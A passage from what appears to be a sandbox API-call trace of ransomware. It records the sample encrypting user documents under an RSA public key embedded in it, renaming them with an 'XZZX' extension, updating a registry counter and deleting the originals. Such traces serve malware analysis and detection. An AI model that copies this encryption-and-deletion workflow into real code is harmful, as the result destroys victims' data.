LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.556] lstrcpyW (in: lpString1=0x42cf460, lpString2="vqWzW8a_K.doc" | out: lpString1="vqWzW8a_K.doc") returned="vqWzW8a_K.doc" [0040.556] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.556] SetErrorMode (uMode=0x1) returned 0x1 [0040.556] lstrcpyW (in: lpString1=0x42cf860, lpString2="vqWzW8a_K.doc" | out: lpString1="vqWzW8a_K.doc") returned="vqWzW8a_K.doc" [0040.556] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xe003eab5, Data2=0xfc8d, Data3=0x40da, Data4=([0]=0xb9, [1]=0xa6, [2]=0x70, [3]=0xe8, [4]=0x12, [5]=0xf4, [6]=0x89, [7]=0xde))) returned 0x0 [0040.556] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\vqWzW8a_K.doc") returned 78 [0040.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0040.556] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\3D3271B13FFA5012E003EAB54427345A.XZZX") returned 102 [0040.556] StrStrW (lpFirst="vqWzW8a_K.doc", lpSrch="XZZX") returned 0x0 [0040.556] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\vqWzW8a_K.doc", dwFileAttributes=0x20) returned 1 [0040.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\vqWzW8a_K.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\vqwzw8a_k.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0040.557] ReadFile (in: hFile=0x4a8, lpBuffer=0x3e4c738, nNumberOfBytesToRead=0x252d, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e4c738*, lpNumberOfBytesRead=0x42ce418*=0x252d, lpOverlapped=0x0) returned 1 [0040.557] CloseHandle (hObject=0x4a8) returned 1 [0040.557] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4180000 [0040.558] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4190000 [0040.558] SetErrorMode (uMode=0x1) returned 0x1 [0040.558] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0040.558] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2e0e8) returned 1 [0040.560] CryptGenKey (in: hProv=0x3e2e0e8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5390) returned 1 [0040.985] CryptExportKey (in: hKey=0x42e5390, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0040.985] CryptExportKey (in: hKey=0x42e5390, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4190000, pdwDataLen=0x42ce41c | out: pbData=0x4190000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0040.985] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.986] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0040.986] CryptDestroyKey (hKey=0x42e5390) returned 1 [0040.986] CryptReleaseContext (hProv=0x3e2e390, dwFlags=0x0) returned 0 [0040.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\3D3271B13FFA5012E003EAB54427345A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\3d3271b13ffa5012e003eab54427345a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0040.986] WriteFile (in: hFile=0x4b8, lpBuffer=0x3e4c738*, nNumberOfBytesToWrite=0x252d, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e4c738*, lpNumberOfBytesWritten=0x42ce438*=0x252d, lpOverlapped=0x0) returned 1 [0040.988] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x252d [0040.988] WriteFile (in: hFile=0x4b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.988] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2532 [0040.988] WriteFile (in: hFile=0x4b8, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x1a, lpOverlapped=0x0) returned 1 [0040.988] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x254c [0040.988] WriteFile (in: hFile=0x4b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.988] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2551 [0040.988] SetErrorMode (uMode=0x1) returned 0x1 [0040.988] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0040.988] OutputDebugStringW (lpOutputString="end") [0040.988] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0040.988] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0040.989] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e2e418) returned 1 [0040.989] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2e418, dwCertEncodingType=0x1, pInfo=0x3e3ee10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3ee40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3ee48*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e5390) returned 1 [0040.989] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.990] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0040.990] CryptEncrypt (in: hKey=0x42e5390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0040.990] CryptEncrypt (in: hKey=0x42e5390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2e4a0*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2e4a0*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0040.990] WriteFile (in: hFile=0x4b8, lpBuffer=0x3e2e4a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2e4a0*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0040.990] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0040.990] WriteFile (in: hFile=0x4b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.990] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0041.071] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0041.071] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4bc) returned 0x0 [0041.071] RegQueryValueExW (in: hKey=0x4bc, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x26, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0041.071] RegCloseKey (hKey=0x4bc) returned 0x0 [0041.071] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4bc) returned 0x0 [0041.071] RegSetValueExW (in: hKey=0x4bc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x27, cbData=0x4 | out: lpData=0x42cdfec*=0x27) returned 0x0 [0041.071] RegCloseKey (hKey=0x4bc) returned 0x0 [0041.072] VirtualFree (lpAddress=0x4180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.072] VirtualFree (lpAddress=0x4190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.072] CloseHandle (hObject=0x4b8) returned 1 [0041.074] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0041.074] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0041.074] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\vqWzW8a_K.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\vqwzw8a_k.doc")) returned 1 [0041.075] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\vqWzW8a_K.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\vqwzw8a_k.doc")) returned 0 Thread: id = 133 os_tid = 0x8ec [0040.806] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.806] lstrcpyW (in: lpString1=0x417f460, lpString2="YYzgnphG.csv" | out: lpString1="YYzgnphG.csv") returned="YYzgnphG.csv" [0040.806] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.806] SetErrorMode (uMode=0x1) returned 0x1 [0040.806] lstrcpyW (in: lpString1=0x417f860, lpString2="YYzgnphG.csv" | out: lpString1="YYzgnphG.csv") returned="YYzgnphG.csv" [0040.806] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xe10dafa3, Data2=0xa527, Data3=0x411b, Data4=([0]=0x99, [1]=0x6c, [2]=0x32, [3]=0x92, [4]=0x18, [5]=0x24, [6]=0xb7, [7]=0x29))) returned 0x0 [0040.806] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\YYzgnphG.csv") returned 77 [0040.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0040.806] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\1B49D0D52A00521DE10DAFA32E183665.XZZX") returned 102 [0040.806] StrStrW (lpFirst="YYzgnphG.csv", lpSrch="XZZX") returned 0x0 [0040.807] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\YYzgnphG.csv", dwFileAttributes=0x20) returned 1 [0040.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\YYzgnphG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\yyzgnphg.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0040.807] ReadFile (in: hFile=0x49c, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x18e1d, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0x18e1d, lpOverlapped=0x0) returned 1 [0040.808] CloseHandle (hObject=0x49c) returned 1 [0040.808] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0040.809] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0040.809] SetErrorMode (uMode=0x1) returned 0x1 [0040.809] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0040.809] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2e390) returned 1 [0040.812] CryptGenKey (in: hProv=0x3e2e390, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5310) returned 1 [0041.174] CryptExportKey (in: hKey=0x42e5310, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0041.174] CryptExportKey (in: hKey=0x42e5310, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0041.174] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.174] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0041.174] CryptDestroyKey (hKey=0x42e5310) returned 1 [0041.174] CryptReleaseContext (hProv=0x3e2e528, dwFlags=0x0) returned 0 [0041.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\1B49D0D52A00521DE10DAFA32E183665.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\1b49d0d52a00521de10dafa32e183665.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0041.175] WriteFile (in: hFile=0x4b0, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x18e1d, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0x18e1d, lpOverlapped=0x0) returned 1 [0041.177] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18e1d [0041.177] WriteFile (in: hFile=0x4b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0041.177] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18e22 [0041.177] WriteFile (in: hFile=0x4b0, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x18, lpOverlapped=0x0) returned 1 [0041.177] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18e3a [0041.177] WriteFile (in: hFile=0x4b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0041.177] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18e3f [0041.177] SetErrorMode (uMode=0x1) returned 0x1 [0041.177] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0041.177] OutputDebugStringW (lpOutputString="end") [0041.178] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0041.178] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0041.178] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2e5b0) returned 1 [0041.178] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2e5b0, dwCertEncodingType=0x1, pInfo=0x3dd2e98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2ec8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2ed0*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5310) returned 1 [0041.178] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.179] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0041.179] CryptEncrypt (in: hKey=0x42e5310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0041.179] CryptEncrypt (in: hKey=0x42e5310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2e638*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2e638*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0041.179] WriteFile (in: hFile=0x4b0, lpBuffer=0x3e2e638*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2e638*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0041.179] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0041.179] WriteFile (in: hFile=0x4b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0041.179] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0041.179] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0041.180] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4b8) returned 0x0 [0041.182] RegQueryValueExW (in: hKey=0x4b8, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x27, lpcbData=0x417dfdc*=0x4) returned 0x0 [0041.182] RegCloseKey (hKey=0x4b8) returned 0x0 [0041.182] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4b8) returned 0x0 [0041.182] RegSetValueExW (in: hKey=0x4b8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x28, cbData=0x4 | out: lpData=0x417dfec*=0x28) returned 0x0 [0041.182] RegCloseKey (hKey=0x4b8) returned 0x0 [0041.182] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.182] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.183] CloseHandle (hObject=0x4b0) returned 1 [0041.184] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0041.185] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0041.185] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\YYzgnphG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\yyzgnphg.csv")) returned 1 [0041.186] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\YYzgnphG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\yyzgnphg.csv")) returned 0 Thread: id = 134 os_tid = 0x744 [0041.025] lstrcpyA (in: lpString1=0x46cfc70, 